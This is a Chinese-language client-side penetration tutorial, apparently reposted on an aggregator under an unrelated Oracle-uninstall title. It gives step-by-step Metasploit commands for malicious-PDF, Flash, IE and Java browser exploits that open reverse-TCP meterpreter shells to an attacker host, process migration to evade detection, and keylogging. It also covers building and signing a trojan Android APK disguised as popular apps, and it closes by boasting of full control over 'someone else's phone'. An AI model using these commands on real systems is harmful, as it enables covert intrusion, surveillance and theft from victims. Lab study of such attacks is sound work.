admin管理员组文章数量:1567012
客户端渗透
漏洞
实战·漏洞利用·提权
需要用到的环境
VMware
kali Linux
win XP
win 7
前言
现实的网络中,企业已经非常注重安全,攻击者也逐步从服务器攻击转向客户端攻击,比如:安卓渗透、软件后门、0day等等。那么,是怎么实现客户端攻击的呢?
某些操作系统和软件应用,没有打上相应的补丁,存在较多的漏洞或是后门,可以通过漏洞或后门进行提权,达到完全控制的效果。
工具
Metasploit
//黑天黑地黑王母的渗透神器
Keytool、JARsigner、zipalign
//APK文件签名三件套
PDF漏洞
WIN7中实验不成功,需在xp上,关闭防火墙和杀毒软件。
实现使用reader 8.1.2 中的漏洞进行客户端的远程控制,该漏洞适用于xp系统,建议升级系统或是升级reader到最新版。
Win xp 上安装adobe reader 8.1.2 版本,不能打补丁
kali中启动msf
root@kali:~# msfconsole > search adobe
> show options
> set payload windows/meterpreter/reverse_tcp> set lhost 192.168.187.128> exploit
//把msf.pdf文件拷贝到靶机上。
//把msf.pdf文件拷贝到远程的windows10上,会被杀毒软件查杀,恢复,压缩共享到windows xp上:
在kali上启动侦听
msf5 exploit(multi/handler) > exploit -j //启动msf5 exploit(multi/handler) > jobs //本地启动4444端口,等待目标连接过来
当在windows xp上,双击msf.pdf文件,利用adobe漏洞,执行:
// msf.pdf是一个空的文件,xp连接到msf上
进程注入
//如果目标主机xp,发现异常,把adobe的进程关闭,可以将adobe的进程迁移到系统进程中,避免被目标主机关闭进程.
meterpreter > ps
meterpreter > migrate -P 1036 -N services.exe
注入成功!
恶意网站
搭建xp环境,关闭防火墙和杀毒软件,不打补丁。
生成恶意的网站诱导用户点击,就能实现对客户端的完全控制。
此漏洞是利用ie浏览器中的已知漏洞。
建议更新系统或更新浏览器进行防范。
未知的链接不能乱点。
> use exploit/windows/browser/adobe_utilprintf> info
//存在该缓冲区溢出漏洞
> set SRVPORT 80> set payload windows/meterpreter/reverse_tcp> set lhost 192.168.187.128> set lport 4445> show options//随机生成url链接,目标查看这个网站容易产生警觉,可以设置:> set uripath /> exploit
//生成的url链接:
//在Xp上,使用ie浏览器打开此链接,在应用场景中,攻击者可使用社会工程学来诱导用户点击此链接。
提权:use priv run post/windows/capture/keylog_recorder //敲击键盘动作的记录====================================================================报错:[-] Exploit failed: Rex::RuntimeError The supplied resource '/' is already added. //80被占用jobsKill id=====================================================================思考???判断下方攻击载荷是什么利用漏洞:exploit/multi/browser/adobe_flash_hacking_team_uafexploit/multi/browser/adobe_flash_opaque_background_uafauxiliary/server/browser_autopwn2没错,就是flash的利用漏洞。
flash漏洞
搭建win7系统,关闭防火墙和杀毒软件,不打补丁。
Windows7中保证安装flash:
msf5 > use exploit/multi/browser/adobe_flash_hacking_team_uafmsf5 exploit(multi/browser/adobe_flash_hacking_team_uaf) > set SRVPORT 80msf5 exploit(multi/browser/adobe_flash_hacking_team_uaf) > set uripath /msf5 exploit(multi/browser/adobe_flash_hacking_team_uaf) > set payloadwindows/meterpreter/reverse_tcpmsf5 exploit(multi/browser/adobe_flash_hacking_team_uaf) > set lhost 192.168.1.115msf5 exploit(multi/browser/adobe_flash_hacking_team_uaf) > set lport 777msf5 exploit(multi/browser/adobe_flash_hacking_team_uaf) > show targets //windows和linux平台上均存在,默认是选择windows,不需要修改
Windows7端访问:http://192.168.1.115:80/
报错:
msf5 exploit(multi/browser/adobe_flash_hacking_team_uaf) > info //查看模板信息
查看该win7靶机的信息:
msf5 > use exploit/multi/browser/adobe_flash_opaque_background_uaf
msf5 exploit(multi/browser/adobe_flash_opaque_background_uaf) > set srvport 80msf5 exploit(multi/browser/adobe_flash_opaque_background_uaf) > set uripath /
客户端访问:
条件不匹配!!!
-----------------------------------------------------------------
msf5 > use auxiliary/server/browser_autopwn2msf5 auxiliary(server/browser_autopwn2) > set SRVPORT 80msf5 auxiliary(server/browser_autopwn2) > set uripath /#所有跟浏览器的漏洞利用代码全部打包起来,形成auxiliary,不需要指定payload
#挑选质量比较好的漏洞,一个个的尝试:
#支持安卓客户端
依次用windows7、安卓、xp、windows10、centos8访问
Windows7上访问地址:
//windows7上存在多个被利用的漏洞,利用成功
IE浏览器的漏洞执行payload:
/windows/browser的模块下,存在大量与浏览器相关的漏洞,可以逐个尝试。
use exploit/windows/browser/ms14_064_ole_code_executionmsf5 > use exploit/windows/browser/ms14_064_ole_code_execution //支持windows7和xpmsf5 exploit(windows/browser/ms14_064_ole_code_execution) > set SRVPORT 80msf5 exploit(windows/browser/ms14_064_ole_code_execution) > set uripath /uripath => /msf5 exploit(windows/browser/ms14_064_ole_code_execution) > set payloadwindows/meterpreter/reverse_tcpmsf5 exploit(windows/browser/ms14_064_ole_code_execution) > set lhost 192.168.1.115msf5 exploit(windows/browser/ms14_064_ole_code_execution) > exploit
客户端windows xp访问:
JRE漏洞
实验环境:
Kali linux:192.168.1.115
Windows xp:192.168.1.112 安装jre-7u10-i586版本
msf5 > use exploit/multi/browser/java_jre17_driver_managermsf5 exploit(multi/browser/java_jre17_driver_manager) > set srvport 80msf5 exploit(multi/browser/java_jre17_driver_manager) > set uripath /msf5 exploit(multi/browser/java_jre17_driver_manager) > set payload java/ //需要选择基于java的meterpreter的payload,不能选择基于windowsset payload java/jsp_shell_bind_tcp set payload java/meterpreter/reverse_tcpset payload java/jsp_shell_reverse_tcp set payload java/shell/bind_tcpset payload java/meterpreter/bind_tcp set payload java/shell/reverse_tcpset payload java/meterpreter/reverse_http set payload java/shell_reverse_tcpset payload java/meterpreter/reverse_httpsmsf5 exploit(multi/browser/java_jre17_driver_manager) > set payload java/meterpreter/reverse_tcpmsf5 exploit(multi/browser/java_jre17_driver_manager) > set lhost 192.168.1.115msf5 exploit(multi/browser/java_jre17_driver_manager) > exploit -j[*] Exploit running as background job 0.[*] Exploit completed, but no session was created.msf5 exploit(multi/browser/java_jre17_driver_manager) >[*] Started reverse TCP handler on 192.168.1.115:4444[*] Using URL: http://0.0.0.0:80/[*] Local IP: http://192.168.1.115:80/ //生成可浏览的网站,一旦在XP上浏览该网站,只要有安装有漏洞的jre程序,会被执行
靶机xp上,浏览器访问http://192.168.1.115
不要点击update,不然漏洞会被修补,选择later,才有实验效果
会话建立成功!攻击成功!
多次尝试以下载荷:use exploit/multi/browser/java_jre17_jmxbeanmsf5 > use exploit/multi/browser/java_jre17_jmxbeanmsf5 exploit(multi/browser/java_jre17_jmxbean) > set payload java/meterpreter/reverse_tcpmsf5 exploit(multi/browser/java_jre17_jmxbean) > set lhost 192.168.1.115msf5 exploit(multi/browser/java_jre17_jmxbean) > set uripath /msf5 exploit(multi/browser/java_jre17_jmxbean) > set srvhost 192.168.1.112msf5 exploit(multi/browser/java_jre17_jmxbean) > set lport 4446msf5 exploit(multi/browser/java_jre17_jmxbean) > set srvport 8080执行失败!use exploit/multi/browser/java_jre17_reflection_typesmsf5 > use exploit/multi/browser/java_jre17_reflection_typesmsf5 exploit(multi/browser/java_jre17_reflection_types) > set srvport 80msf5 exploit(multi/browser/java_jre17_reflection_types) > set uripath /msf5 exploit(multi/browser/java_jre17_reflection_types) > set payload java/meterpreter/reverse_tcpmsf5 exploit(multi/browser/java_jre17_reflection_types) > set lhost 192.168.1.115msf5 exploit(multi/browser/java_jre17_reflection_types) > exploit -j执行成功!
最后一个!安卓渗透!
生成Android后门程序:use payload/android/meterpreter/reverse_tcpgenerate -p android -o xxx.apk //生成a.apk文件,-p 平台生成payload,放入手机中执行:msf5 > use payload/android/meterpreter/reverse_tcpmsf5 payload(android/meterpreter/reverse_tcp) > set lhost 192.168.1.115msf5 payload(android/meterpreter/reverse_tcp) > generate -p android -o wandoujia.apkroot@kali:~# lswandoujia.apk放入windows中,杀毒软件不会检测apk文件,上传到安卓手机中安装: (需要连接数据线或蓝牙传输),在安卓手机上安装即可msf中监听:msf5 payload(android/meterpreter/reverse_tcp) > use exploit/multi/handlermsf5 exploit(multi/handler) > set payload android/meterpreter/reverse_tcpmsf5 exploit(multi/handler) > set lhost 192.168.1.115msf5 exploit(multi/handler) > set lport 777
安卓手机上安装:会报错,解析包出问题
下面使用第二种方法:
msf5 > msfvenom --platform android -p android/meterpreter/reverse_tcp lhost=192.168.1.115 lport=9000-o meituan.apk //生成木马,蓝牙发送至手机,安装,生成一个appmsf5 > use exploit/multi/handlermsf5 exploit(multi/handler) > set payload android/meterpreter/reverse_tcpmsf5 exploit(multi/handler) > set lport 9000msf5 exploit(multi/handler) > exploit -j
并点击生成的app执行,并可以wlan:
即使能进入meterprer也会出现会话关闭现象!
解决办法:制作签名
生成的这个apk不能直接在Android中直接运行,
因为这个apk需要一个签名才可以运行。
下面我们为这个apk生成一个签名。
创建签名需要使用Keytool、JARsigner、zipalign这3个软件。
Kali中内置了前2个,第3个需要安装。
第一步:
使用keytool生成一个key文件。会让你输入该key的名称、单位、地址等等信息,最终生成一个key文件。
root@kali:~# keytool -genkey -v -keystore my-release-key.Keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 1000
生成文件:my-release-key.Keystore
第二步:
使用该key文件配合JARsigner为APK签名
root@kali:~# apt-get install openjdk-13-jdk-headless //安装签名工具root@kali:~# jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore meituan.apk alias_name
第三步:
使用JARsigner验证签名
root@kali:~# jarsigner -verify -verbose -certs meituan.apk
现在apk文件可以在任何安卓中使用,重新蓝牙发送到手机,并安装,显示如下图标:
执行报错:
解决:
点击安装的图标:
于是,就可以在别人手机里为所欲为了。
-END-
"TAKE LIFE SERIOUSLY "
每一个认真生活的人,都值得被认真对待。
版权声明:本文标题:windows server 2012 上 oracle客户端卸载步骤干净_攻防|客户端渗透 内容由热心网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:https://www.elefans.com/dongtai/1727571038a1121287.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论